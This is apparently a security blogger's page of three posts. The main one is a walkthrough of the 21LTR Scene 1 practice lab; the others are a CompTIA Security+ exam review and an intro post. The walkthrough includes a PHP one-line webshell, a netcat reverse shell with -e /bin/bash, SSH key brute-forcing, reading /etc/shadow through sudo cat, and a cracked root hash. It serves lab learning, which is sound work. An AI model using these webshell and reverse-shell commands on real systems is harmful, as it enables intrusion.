December 16, 2016

21LTR: Scene 1 Walkthrough

Today I will write my "21 LTR:Scene 1" walkthrough from . You can download it here -
Also 2 write-ups are already available:

Firstly, g0tmi1k, thanks for awesome resource of fun! Secondly, I will show my steps to get in as a step by step list of commands, explanations and screenshots. Let's start.


1. Find out vulnerable machine IP: netdiscover -i vboxnet2
2. Let's scan for open ports: nmap -sS -A -p 1-65535
It is always important to check all TCP/UDP ports, because it is quite common that some sysadmins think that port from high range is a good defense. Security through Obscurity! Here is the output:

3. I tried to login with anonymous credentials to ftp - no luck. I ran to enumerate directories. Great tool, you can check it here - Tool found 3 directories with no valuable information there. If you have a web page - always examine source code. It can give you hints about software version and sometimes really expand attack surface. On I found this:
4. I used this credentials to login FTP. There I found backup_log.php file. I tried to access this file using URL and saw a page with recent backup reports. 

At this moment I was stuck for a while. From my OSCP experience I remembered one valuable advice: "Don't know what to do? Listen on what is going on the wire." The only change I did was IP. I used because I saw this in report.

5. I launched wireshark and went for coffee. When I was back I saw this:

Victim tried to connect on port 10000. OK, let's launch nc -nlvp 10000.
After some period of time I saw some binary data received by nc. Before jumping in rabbit hole with received data, I tried immediately to connect to port 10001: nc -nv 10001. I got empty shell with no output. It looked like victim was executed something on machine and then opened port 10001 for short period of time to receive results.

6. I tried to insert commands without success but then I executed backup_log.php one more time and saw this:

Let's try to insert PHP one-line webshell: <?php echo exec($_GET["cmd"]);?>
I always prefer to use reverse shell when it is possible, so I can navigate on vulnerable machine without inconvenience. Let's try netcat with -e option: -nlvp 2608 -e /bin/bash

7. We are in! We have apache privileges. Not too much really. Let's spawn full shell using python -c 'import pty;pty.spawn("/bin/bash")' By the way, here is an excellent cheat sheet how to spawn shell using different languages -
Privilege escalation is always a tricky thing. I often start with enumeration and then go for kernel exploits. For enumeration I advice this article from g0tmi1k -
For exploitation attempts you can try this perl tool - It is quite accurate.

8. During enumeration I found archive in /tmp - backup.tar.gz. After first decompression I found it in media/backup/pxelinux.cfg.tar.gz. Let's see what we have in /media. USB_1 sounded as attached USB key. I found there ssh private key, located in /media/USB_1/Stuff/Keys. Also I enumerated users in /home folder.

9. I copied the id_rsa key and tried to bruteforce ssh using usernames from /home and copied key. I was lucky with hbeale. Next step for me is always to run sudo -l. It saves so much time. Here I found that I can run cat with no password check. I tried cat /etc/shadow and got hash for root password - $1$VW5E9DmD$deoML8uqU/4HaTmNmfM7G1. I ran john with rockyou dictionary to find out password. 3 seconds later I found that password was "formula1". 

Using su and password I got root privileges. Done!

Lessons Learned

Key to this machine is to understand how to use port 10001. Without passive reconnaissance you won't be successful. Also it is essential to dig into and enumerate accessible folders on the machine. Examining each folder can be boring, but you can also automate this using tools from here -

Good luck in your research and mastering!

October 26, 2016

CompTIA Security+ certification review


   I will start my certification story with Security+. At the beginning of 2015 my wife and I decided to relocate from Russia somewhere in Europe, because technical security jobs in my city are at low demand with pretty shit salaries by the way. So one of the first steps for us was to convert my knowledge in something more recognizable all around the world. I read some reviews regarding different certifications and decided to start with CompTIA Security+. I knew that this certification is an entry level one for security, so I it didn't take much time to prepare. Another important reason was that English is not my native language, so I wanted to get a feel of enterprise security terms and approaches.
   I have quite weird thoughts about certification process itself. It is not rare that certification is used not for proving skills, just to move up for career ladder regardless what you know and your abilities. That is why I am a big fan of Offensive Security guys, their approach and frustration. Obviously for Security+ you can easily google dumps, but if you don't understand the actual material you will struggle a lot in feature. By the way price around 300$ is quite challenging in Russia I decided to pass exam myself as I did before in school and University. I was always bad in "copy-paste" way.
   I examined CompTIA site and found more details about themes:
  • Network Security - 21%
  • Compliance and Operational Security - 18%
  • Threats and Vulnerabilities - 21%
  • Application, Data and Host Security - 16%
  • Access Control and Identity Management - 13%
  • Cryptography - 11%
All questions were divided on these categories. 90 questions/90 minutes to complete exam. 900 points maximum, 750 to pass. Let's prepare.


There were 2 books for Security+ preparation:

Both books were excellent preparation guide. Let's dig a bit in. Topics were quite similar, so I will speak about both books in general.
  1. Network Security. Here you will find all variety of topics about firewalls, IPS/IDS, VLAN, DMZ, NAT, protocols from different layers of TCP/IP stack and etc. In exam most of the questions in these domain would be about port numbers and associated protocols, effective security measures to lock down security on network level, wireless security.
  2. Compliance and Operational Security. This part is quite boring and annoying, but I can't but mention the fact that these topics would be very helpful for you when you will decide to ask security budget increase or buy new fancy useless security toy=) Disaster recovery, backup plans, incident response, risk management - understanding all these topics would be handy to speak with business. More interesting to read about physical security and security administration. Remember all abbreviations, what they mean and how technical stuff influence them.
  3. Threats and Vulnerabilities. I think most interesting topic in both books. You will dive in malware classification, application and general attacks, social engineering. Most questions from this category would be about choosing best way to mitigate some threat or to distinct one threat from another.
  4. Access Control and Identity Management. Here you will deal with authentication/authorization (802.1x, port security, RADIUS and etc), host-based security software, ways to improve security on endpoints. Most questions would be about how to implement these features to address specific threat in most effective way.
  5. Cryptography. Key concepts of symmetric and public key cryptography, hashing, most common protocols, limitations and recommended parameters to use. Also network protocols which use cryptography heavily would be described: IPSec, TLS, HTTPS and etc.


   My review would not be really full without my impression about exam. Actually it was not too bad. CompTIA gave you various number of situations and asked for best solution in this situation. 2 out of 4 answers were quite stupid, but to choose right one you will probably need to think a bit. It was all about choosing best variant. You need to remember 2 parameters from situation in your head to do right  choice. Also you can find performance-based questions, which were far away from practice. In one question you will probably found parts from different domains. For question examples-have a look at samples in books above.
   I spent 2 weeks to prepare for this exam. I did it in PearsonVue center. I used about 60 minutes to achieve 880/900, probably I missed 1 or 2 questions. My first step towards relocation was made.


This exam can prove your entry level of understanding security. It is not hard technical exam, more situation based. Obviously, good university would provide all necessary background to pass this exam quickly. If you are looking for Level 1 position or your first infosec job it is a good choice. With my current level of experience and knowledge I would not bother to recertify after expiration.

October 17, 2016

Share is fun!

   A lot of things happened since my last blog post. During last 2 years I could not find time to write a blog post=) Lie! However, now my wife and I raise 2 beautiful kids and we teach them that "share is fun". As you know, in order to show best example for kids you need to follow your own words. Let's get it started!

   I have a lot of material to share in my blog. I will try to write frequently, at least 2 times a week. I am going to cover different things:

  • my experience of passing Security+, CEH, OSCP, OSWP, OSCE, SANS GXPN. Also I hope to achieve SANS GREM and SLAE this year, so probably I will cover them too.
  • talk about Info Sec books, blogs and other resource I use to broad my knowledge. Unfortunately, there is not too much really good resources and books, so I will try to cover them.
  • describe interesting stuff that I face during my way in Info Sec. I am not going to copy/paste excellent materials from Corelan, fuzzy security and etc, but I am going to explain moments that was not clear for me during reading and I spent some time to research it.
  • create series of articles regarding Linux exploitation and some other things that is not clearly described in the Internet. Before starting something like this I will examine carefully available resources in order not to reinvent a wheel.

My main goal for this blog is to make it unique, interesting to read and valuable for different folks in Info Sec field.